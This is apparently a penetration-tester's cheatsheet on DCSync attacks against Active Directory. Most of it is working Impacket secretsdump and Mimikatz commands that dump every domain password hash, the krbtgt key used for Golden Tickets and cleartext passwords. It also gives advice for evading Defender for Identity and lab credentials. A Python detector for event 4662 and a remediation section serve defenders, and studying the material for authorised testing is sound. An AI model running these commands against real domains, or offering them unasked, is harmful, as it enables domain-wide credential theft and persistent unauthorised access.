🛡️ Methodology Checklist
- Confirm user has DCSync rights:
  Get-DomainUser [USER] | select objectsid
  + BloodHound ACL check
- DCSync from Linux:
  impacket-secretsdump [DOMAIN]/[USER]:[PASS]@[DC_IP] -just-dc-ntlm
- DCSync from Windows (Mimikatz):
  lsadump::dcsync /user:[DOMAIN]\[USER]
- Dump all:
  lsadump::dcsync /all /csv
- Extract krbtgt hash for Golden Ticket
- Crack hashes offline:
  hashcat -m 1000 hashes.txt [wordlist]
- Use hashes for PtH or further lateral movement
🎯 Operational Context
Use when: Account with replication rights (DS-Replication-Get-Changes + DS-Replication-Get-Changes-All) obtained — replicate NTLM hashes for any account including krbtgt.
Think Dumber First: nxc smb [DC] -u [USER] -p [PASS] --ntds or impacket-secretsdump [DOMAIN]/[USER]:[PASS]@[DC] — DCSync impersonates a domain controller to request credential replication. Gets every hash in the domain in one command.
Skip when: Microsoft Defender for Identity is deployed — DCSync is heavily monitored; use VSS-based NTDS extraction instead.
⚡ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
| secretsdump.py -outputfile domain_hashes -just-dc [DOMAIN]/[USER]:[PASS]@[DC_IP] | Full NTDS dump via DCSync (Linux) |
| secretsdump.py -outputfile domain_hashes -just-dc-user [DOMAIN]/[USER]:[PASS]@[DC_IP] [DOMAIN]\[TARGET_USER] | DCSync for a single user only |
| runas /netonly /user:[DOMAIN]\[DCSYNC_USER] powershell | Spawn authenticated PS session as DCSync-capable user |
| mimikatz # privilege::debug | Enable debug privilege in Mimikatz |
| mimikatz # lsadump::dcsync /domain:[DOMAIN_FQDN] /user:[DOMAIN]\[TARGET_USER] | DCSync specific user via Mimikatz |
| Get-ADUser -Filter 'userAccountControl -band 128' -Properties userAccountControl | Find accounts with reversible encryption (will yield cleartext) |
🔬 Deep Dive & Workflow
How DCSync Works
DCSync abuses the Directory Replication Service Remote Protocol (MS-DRSR). The attacker’s tool impersonates a Domain Controller and requests that the real DC replicate secret data (password hashes) — the same mechanism used for legitimate DC-to-DC replication. No code runs on the DC itself.
Required rights over the domain object:
- DS-Replication-Get-Changes
- DS-Replication-Get-Changes-All
Domain Admins and Enterprise Admins hold these rights by default. Misconfigured service accounts or users frequently inherit them — hunt via BloodHound (Outbound Control Rights → look for DCSync edges to non-DA users).
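The mirror image of the hunt above, from the detection side: because DCSync is a replication request against the domain object, a domain controller with a SACL auditing "Replicating Directory Changes" logs Security event 4662 whose Properties field carries the two extended-rights GUIDs, and any subject that is not a DC computer account is suspicious. The following is an added example, not from the original page; it assumes a simplified key=value export of 4662 events (real events wrap the GUIDs in braces and span several lines) and uses constructed sample records.

```python
"""Flag DCSync-style replication requests in Windows Security event 4662.

Added example (not from the original page). Assumes the DC forwards
4662 events as one key=value line each; the sample lines are constructed.
"""
import re

# Extended-rights GUIDs from the AD schema that appear in the 4662
# Properties field when a principal pulls directory changes.
DS_REPL_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPL_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPL_GUIDS = {DS_REPL_GET_CHANGES, DS_REPL_GET_CHANGES_ALL}

# Constructed sample: legitimate DC-to-DC replication (DC01$), a user
# account replicating the domain object (the DCSync pattern), an
# unrelated 4662 on a user object, and a non-4662 event.
SAMPLE_4662 = """\
EventID=4662 SubjectUserName=DC01$ SubjectDomainName=INLANEFREIGHT ObjectType=domainDNS Properties=1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2
EventID=4662 SubjectUserName=adunn SubjectDomainName=INLANEFREIGHT ObjectType=domainDNS Properties=1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2
EventID=4662 SubjectUserName=jsmith SubjectDomainName=INLANEFREIGHT ObjectType=user Properties=bf967a86-0de6-11d0-a285-00aa003049e2
EventID=4624 SubjectUserName=adunn SubjectDomainName=INLANEFREIGHT
"""


def parse_event(line):
    """Turn 'Key=Value Key=Value ...' into a dict (values have no spaces)."""
    return dict(re.findall(r"(\w+)=(\S+)", line))


def is_replication_request(event):
    """True when a 4662 event exercises either replication extended right."""
    props = set(event.get("Properties", "").lower().split(";"))
    return event.get("EventID") == "4662" and bool(props & REPL_GUIDS)


def find_dcsync_candidates(log_text, dc_accounts):
    """Return subjects that replicated directory changes but are not known DCs."""
    known_dcs = {name.upper() for name in dc_accounts}
    hits = []
    for line in log_text.splitlines():
        event = parse_event(line)
        if not is_replication_request(event):
            continue
        if event["SubjectUserName"].upper() in known_dcs:
            continue  # expected DC-to-DC replication traffic
        hits.append(event["SubjectUserName"])
    return hits


if __name__ == "__main__":
    print(find_dcsync_candidates(SAMPLE_4662, ["DC01$"]))  # ['adunn']
```

The allowlist of DC computer accounts is the part that needs maintaining; a new DC that is not added will show up as a false positive, which is preferable to allowlisting every account ending in `$`.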
Linux — Impacket secretsdump.py
```bash
# Full NTDS dump — all users, all hashes
secretsdump.py -outputfile inlanefreight_hashes -just-dc INLANEFREIGHT.LOCAL/adunn:SyncMaster757@172.16.5.5
# Single user (fast, low noise)
secretsdump.py -outputfile krbtgt_hash -just-dc-user INLANEFREIGHT.LOCAL/adunn:SyncMaster757@172.16.5.5 INLANEFREIGHT\krbtgt
```
Output files generated:
- *.ntds — NTLM hashes for all user accounts
- *.ntds.kerberos — Kerberos keys
- *.ntds.cleartext — plaintext passwords (accounts with reversible encryption enabled)
Critical flags:
- -just-dc — dump from NTDS.dit via network replication (what you want)
- Without -just-dc, the tool attempts to dump local SAM hashes from the DC instead
Windows — Mimikatz
When operating from a compromised Windows host:
```
# 1. Spawn a shell in the context of the DCSync-capable user
runas /netonly /user:INLANEFREIGHT\adunn powershell
# 2. In the new window, run Mimikatz
.\mimikatz.exe
privilege::debug
lsadump::dcsync /domain:INLANEFREIGHT.LOCAL /user:INLANEFREIGHT\administrator
# Get krbtgt hash for Golden Ticket creation
lsadump::dcsync /domain:INLANEFREIGHT.LOCAL /user:INLANEFREIGHT\krbtgt
```
/netonly flag: Authenticates to network resources as the specified user while keeping the current user’s local context. Required when the DCSync-capable account is not logged in interactively.
Reversible Encryption — Cleartext Harvest
Some accounts store passwords with reversible encryption for legacy application support. Find them before DCSync to know which accounts will yield plaintext:
```
Get-ADUser -Filter 'userAccountControl -band 128' -Properties userAccountControl
```
When secretsdump runs against these accounts, the DC’s Syskey is used to decrypt them — output appears in the .ntds.cleartext file.
Post-DCSync Priority Targets
| Target | Use Case |
|---|---|
| administrator | Pass-the-Hash domain admin access |
| krbtgt | Golden Ticket — persistent DA-equivalent access |
| All hashes | Offline cracking; lateral movement spray |
🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| DCSync returns ‘access denied’ | Missing replication rights | Verify: Get-DomainObjectAcl -Identity 'DC=domain,DC=com' \| Where-Object {$_.IdentityReference -like '*[USER]*'} |
| impacket-secretsdump very slow | Large domain | Dump specific account: impacket-secretsdump -just-dc-user krbtgt [DOMAIN]/[USER]:[PASS]@[DC] |
| DCSync blocked by MDI/Defender | Behavioral detection | Switch to VSS shadow copy extraction: less detectable than DCSync |
| Hash returned but not valid | Wrong DC targeted | Specify -dc-ip [PRIMARY_DC]; replicate from primary DC for most up-to-date hashes |
| secretsdump returns NTLM format but mimikatz fails to use | Hash format difference | impacket format: LM:NTLM; for mimikatz use NTLM portion only (after :) for PtH |
📝 Reporting Trigger
Finding Title: DCSync Attack Replicates All Domain Credential Hashes
Impact: DCSync replicates NTLM hashes for all AD accounts including krbtgt, enabling Golden Ticket creation for unlimited persistent domain access and Pass-the-Hash attacks against every account in the domain.
Root Cause: Account with DS-Replication permissions compromised. DCSync not detected — no alerting on replication requests from non-DC sources.
Recommendation: Remove unnecessary DS-Replication permissions. Deploy Microsoft Defender for Identity to alert on DCSync activity. After confirmed DCSync: reset krbtgt twice (24-hour interval), reset all compromised accounts, consider forest recovery.